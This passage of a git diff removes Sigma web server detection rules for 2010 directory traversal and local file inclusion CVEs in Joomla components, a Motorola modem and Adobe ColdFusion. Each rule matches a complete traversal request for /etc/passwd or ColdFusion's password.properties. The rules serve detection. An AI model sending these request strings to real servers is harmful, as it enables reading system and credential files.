/dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1601 Exploitation Attempt -id: b2dd80fa-e3bf-4321-bc39-c37295d513dd -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component JA Comment - Local File Inclusion:Directory traversal - vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1602_exploitation_attempt.yml b/rules/web/web_cve_2010_1602_exploitation_attempt.yml deleted file mode 100644 index a41a645d..00000000 --- a/rules/web/web_cve_2010_1602_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1602 Exploitation Attempt -id: f042c30f-ec39-4d1f-bc8b-56c94cd870a7 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion:Directory - traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for - Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1607_exploitation_attempt.yml b/rules/web/web_cve_2010_1607_exploitation_attempt.yml deleted file mode 100644 index 6fdab6d4..00000000 --- a/rules/web/web_cve_2010_1607_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1607 Exploitation Attempt -id: 699e3765-a82a-4d7c-8214-8e8fe7c57fdd -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component WMI 1.5.0 - Local File Inclusion:Directory traversal - vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) - component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary - local files via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1657_exploitation_attempt.yml b/rules/web/web_cve_2010_1657_exploitation_attempt.yml deleted file mode 100644 index d861dbc2..00000000 --- a/rules/web/web_cve_2010_1657_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1657 Exploitation Attempt -id: e218a3bd-5583-4737-a993-60c14a6839a8 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component SmartSite 1.0.0 - Local File Inclusion:Directory traversal - vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1659_exploitation_attempt.yml b/rules/web/web_cve_2010_1659_exploitation_attempt.yml deleted file mode 100644 index e2208448..00000000 --- a/rules/web/web_cve_2010_1659_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1659 Exploitation Attempt -id: dde389b6-a56a-48a6-98f6-a58ea7adc0b6 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion:Directory - traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component - 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) - in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1714_exploitation_attempt.yml b/rules/web/web_cve_2010_1714_exploitation_attempt.yml deleted file mode 100644 index 16d1438a..00000000 --- a/rules/web/web_cve_2010_1714_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1714 Exploitation Attempt -id: 52e333b4-a627-44d5-818d-c222c47568e4 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Arcade Games 1.0 - Local File Inclusion:Directory traversal - vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1717_exploitation_attempt.yml b/rules/web/web_cve_2010_1717_exploitation_attempt.yml deleted file mode 100644 index b0533786..00000000 --- a/rules/web/web_cve_2010_1717_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1717 Exploitation Attempt -id: 7b5b8495-759b-4ebe-917e-7902579036d9 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component iF surfALERT 1.2 - Local File Inclusion:Directory traversal - vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows - remote attackers to read arbitrary files and possibly have unspecified other impact - via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1718_exploitation_attempt.yml b/rules/web/web_cve_2010_1718_exploitation_attempt.yml deleted file mode 100644 index 67d257ae..00000000 --- a/rules/web/web_cve_2010_1718_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1718 Exploitation Attempt -id: b263bad9-acf2-45d6-a1e7-bfde91cdcf08 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion:Directory - traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) - component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary - local files via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1719_exploitation_attempt.yml b/rules/web/web_cve_2010_1719_exploitation_attempt.yml deleted file mode 100644 index c5589c7f..00000000 --- a/rules/web/web_cve_2010_1719_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1719 Exploitation Attempt -id: 77d936f8-0b09-4996-bb2e-52893a34f91f -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion:Directory - traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for - Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1722_exploitation_attempt.yml b/rules/web/web_cve_2010_1722_exploitation_attempt.yml deleted file mode 100644 index 98629be1..00000000 --- a/rules/web/web_cve_2010_1722_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1722 Exploitation Attempt -id: 26b7051c-48b7-4212-ac5e-c8799fe80bdf -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Online Market 2.x - Local File Inclusion:Directory - traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! - allows remote attackers to read arbitrary files and possibly have unspecified other - impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1875_exploitation_attempt.yml b/rules/web/web_cve_2010_1875_exploitation_attempt.yml deleted file mode 100644 index fff7c165..00000000 --- a/rules/web/web_cve_2010_1875_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1875 Exploitation Attempt -id: 28aadbf4-5125-4e7c-9f79-c907363bebd2 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Property - Local File Inclusion:Directory traversal - vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for - Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1953_exploitation_attempt.yml b/rules/web/web_cve_2010_1953_exploitation_attempt.yml deleted file mode 100644 index 68fd370b..00000000 --- a/rules/web/web_cve_2010_1953_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1953 Exploitation Attempt -id: ebcd435e-0ed6-4d35-b08f-d5a875608f82 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion:Directory - traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1954_exploitation_attempt.yml b/rules/web/web_cve_2010_1954_exploitation_attempt.yml deleted file mode 100644 index 1da216a2..00000000 --- a/rules/web/web_cve_2010_1954_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1954 Exploitation Attempt -id: 651421c8-279e-4813-954e-64b9d05d1a06 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion:Directory - traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component - 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. - (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1955_exploitation_attempt.yml b/rules/web/web_cve_2010_1955_exploitation_attempt.yml deleted file mode 100644 index abdda4f9..00000000 --- a/rules/web/web_cve_2010_1955_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1955 Exploitation Attempt -id: ed851f14-5b09-4463-bd9b-75bade8718ff -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion:Directory - traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1956_exploitation_attempt.yml b/rules/web/web_cve_2010_1956_exploitation_attempt.yml deleted file mode 100644 index 448c125f..00000000 --- a/rules/web/web_cve_2010_1956_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1956 Exploitation Attempt -id: 19d87410-0d59-4176-b0f2-65c2e33c07e7 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion:Directory - traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 - and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1979_exploitation_attempt.yml b/rules/web/web_cve_2010_1979_exploitation_attempt.yml deleted file mode 100644 index 1ecb9b3b..00000000 --- a/rules/web/web_cve_2010_1979_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1979 Exploitation Attempt -id: 924df1b0-04f2-4e4a-b638-519a6eb3d4e5 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion:Directory - traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build - 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) - in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1980_exploitation_attempt.yml b/rules/web/web_cve_2010_1980_exploitation_attempt.yml deleted file mode 100644 index c142f120..00000000 --- a/rules/web/web_cve_2010_1980_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1980 Exploitation Attempt -id: f6af8453-b1d9-4714-a005-fd231d940855 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion:Directory - traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) - component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary - local files via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1981_exploitation_attempt.yml b/rules/web/web_cve_2010_1981_exploitation_attempt.yml deleted file mode 100644 index a66a6582..00000000 --- a/rules/web/web_cve_2010_1981_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1981 Exploitation Attempt -id: c0bc20f5-f9f7-4019-83fd-19398acdfb0a -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Fabrik 2.0 - Local File Inclusion:Directory traversal - vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1983_exploitation_attempt.yml b/rules/web/web_cve_2010_1983_exploitation_attempt.yml deleted file mode 100644 index 208e28d0..00000000 --- a/rules/web/web_cve_2010_1983_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1983 Exploitation Attempt -id: 113530a7-3288-4f04-887d-127c962e0415 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component redTWITTER 1.0 - Local File Inclusion:Directory traversal - vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the view parameter to index.php -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2033_exploitation_attempt.yml b/rules/web/web_cve_2010_2033_exploitation_attempt.yml deleted file mode 100644 index 133697d2..00000000 --- a/rules/web/web_cve_2010_2033_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2033 Exploitation Attempt -id: 8081629e-b3a0-4abc-b254-1cdf6cd8f9c8 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla Percha Categories Tree 0.6 - Local File Inclusion:Directory traversal - vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x - for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2034_exploitation_attempt.yml b/rules/web/web_cve_2010_2034_exploitation_attempt.yml deleted file mode 100644 index 55fa1106..00000000 --- a/rules/web/web_cve_2010_2034_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2034 Exploitation Attempt -id: af8a99cc-e237-405f-a399-dd3d81109c90 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Percha Image Attach 1.1 - Directory Traversal:Directory - traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component - 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2035_exploitation_attempt.yml b/rules/web/web_cve_2010_2035_exploitation_attempt.yml deleted file mode 100644 index ab08ba81..00000000 --- a/rules/web/web_cve_2010_2035_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2035 Exploitation Attempt -id: 58483eec-3415-4b3a-958b-5107727a3388 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal:Directory - traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 - Beta for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2036_exploitation_attempt.yml b/rules/web/web_cve_2010_2036_exploitation_attempt.yml deleted file mode 100644 index 0d46db2a..00000000 --- a/rules/web/web_cve_2010_2036_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2036 Exploitation Attempt -id: e5fa9960-e1c3-4f95-93c0-66e3c29bd5d8 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal:Directory - traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component - 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2122_exploitation_attempt.yml b/rules/web/web_cve_2010_2122_exploitation_attempt.yml deleted file mode 100644 index 015f44d8..00000000 --- a/rules/web/web_cve_2010_2122_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2122 Exploitation Attempt -id: be413e66-166e-42bb-875d-72552abfe774 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component simpledownload 0.9.5 - Local File Disclosure:Directory - traversal vulnerability in the SimpleDownload (com_simpledownload) component before - 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local - files via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2259_exploitation_attempt.yml b/rules/web/web_cve_2010_2259_exploitation_attempt.yml deleted file mode 100644 index 32350c5d..00000000 --- a/rules/web/web_cve_2010_2259_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2259 Exploitation Attempt -id: c26a4ac4-9dff-47b3-a602-70eb83aad468 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_bfsurvey - Local File Inclusion:Directory traversal - vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote - attackers to include and execute arbitrary local files via a .. (dot dot) in the - controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2307_exploitation_attempt.yml b/rules/web/web_cve_2010_2307_exploitation_attempt.yml deleted file mode 100644 index 91eeaa63..00000000 --- a/rules/web/web_cve_2010_2307_exploitation_attempt.yml +++ /dev/null @@ -1,27 +0,0 @@ -title: CVE-2010-2307 Exploitation Attempt -id: dd54adb6-05b1-40d6-a609-d5c8f3745853 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - - Directory Traversal:Multiple directory traversal vulnerabilities in the web server - for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC - allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), - (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /../../etc/passwd - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2682_exploitation_attempt.yml b/rules/web/web_cve_2010_2682_exploitation_attempt.yml deleted file mode 100644 index 3f464d30..00000000 --- a/rules/web/web_cve_2010_2682_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2682 Exploitation Attempt -id: 74bbe7ca-4136-46a2-a5fd-f521b0c773b3 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion:Directory - traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 - for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2861_exploitation_attempt.yml b/rules/web/web_cve_2010_2861_exploitation_attempt.yml deleted file mode 100644 index 8477110d..00000000 --- a/rules/web/web_cve_2010_2861_exploitation_attempt.yml +++ /dev/null @@ -1,27 +0,0 @@ -title: CVE-2010-2861 Exploitation Attempt -id: b7f12d62-4aa3-48aa-bfbf-5a12966ebed9 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI:Multiple directory traversal - vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier - allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, - (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, - and (5) enter.cfm in CFIDE/administrator/. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2920_exploitation_attempt.yml b/rules/web/web_cve_2010_2920_exploitation_attempt.yml deleted file mode 100644 index 32a850de..00000000 --- a/rules/web/web_cve_2010_2920_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2920 Exploitation Attempt -id: c4bdce4d-6a3c-4760-be05-a3bf923f7f0e -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion:Directory - traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component - 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory - traversal sequences in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_3426_exploitation_attempt.yml b/rules/web/web_cve_2010_3426_exploitation_attempt.yml deleted file mode 100644 index 69f3ca3f..00000000 --- a/rules/web/web_cve_2010_3426_exploitation_attempt.yml 